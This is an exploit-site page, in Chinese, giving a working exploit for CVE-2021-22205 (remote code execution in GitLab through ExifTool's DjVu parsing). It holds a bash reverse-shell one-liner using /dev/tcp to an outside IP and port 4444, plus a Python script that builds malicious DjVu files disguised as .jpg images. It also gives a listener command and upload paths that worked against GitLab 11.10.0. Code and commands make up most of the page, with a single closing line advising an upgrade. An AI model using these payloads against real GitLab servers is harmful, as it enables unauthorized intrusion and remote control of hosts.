Share
## https://sploitus.com/exploit?id=79FC7D55-7101-56EA-94E4-ABC94E423B3E
# CVE-2021-22205-getshell
CVE-2021-22205-getshell

## 测试版本


## 构造生成漏洞利用的命令
```bash
echo 'bash -i >& /dev/tcp/192.168.147.5/4444 0>&1' > /tmp/1.sh
chmod +x /tmp/1.sh
/bin/bash /tmp/1.sh
```

## 利用djvumake生成漏洞利用的图片
```python
import os
payloads=[
  "echo 'bash -i >& /dev/tcp/192.168.147.5/4444 0>&1' > /tmp/1.sh",
  "chmod +x /tmp/1.sh",
  "/bin/bash /tmp/1.sh",
]
index=1000
for payload in payloads:
  rce_payload = '(metadata\n\t(Copyright "\\\n" . qx{{{0}}} . \\\n" b ") )\n'.format(payload).encode()
  with open("rce-{0}.txt".format(index), "wb") as text_file:
    text_file.write(rce_payload)
  text_file.close()
  os.system("./djvumake rce-{0}.djvu INFO=0,0 BGjp=/dev/null ANTa=rce-{1}.txt && mv rce-{2}.djvu rce-{3}.jpg".format(index,index,index,index))
  index=index+1
```

## 本地监听4444端口等待反弹shell
```bash
nv -lv 192.168.147.5 4444
```
## 分别上传图片到gitlab
- 这里是和网上exp有出入的地方,很多漏洞exp使用的gitlab应该是高版本应该是12或者13的版本的使用的上传点是新建Snippets处,path为:/uploads/user
- 我这边验证的版本是11.10.0的,利用公开的上传路径/uploads/user,提示404,利用Snippets的上传路径/uploads/personal_snippet,没法执行命令
- 最终从新建issue的页面上传图片,成功实现命令执行


## 成功反弹shell拿到目标机器权限
分别上传三个图片后,第三个图片回执行反弹shell命令,成功拿到目标机器权限

## 修复建议
尽快升级Gitlab至最新的安全版本。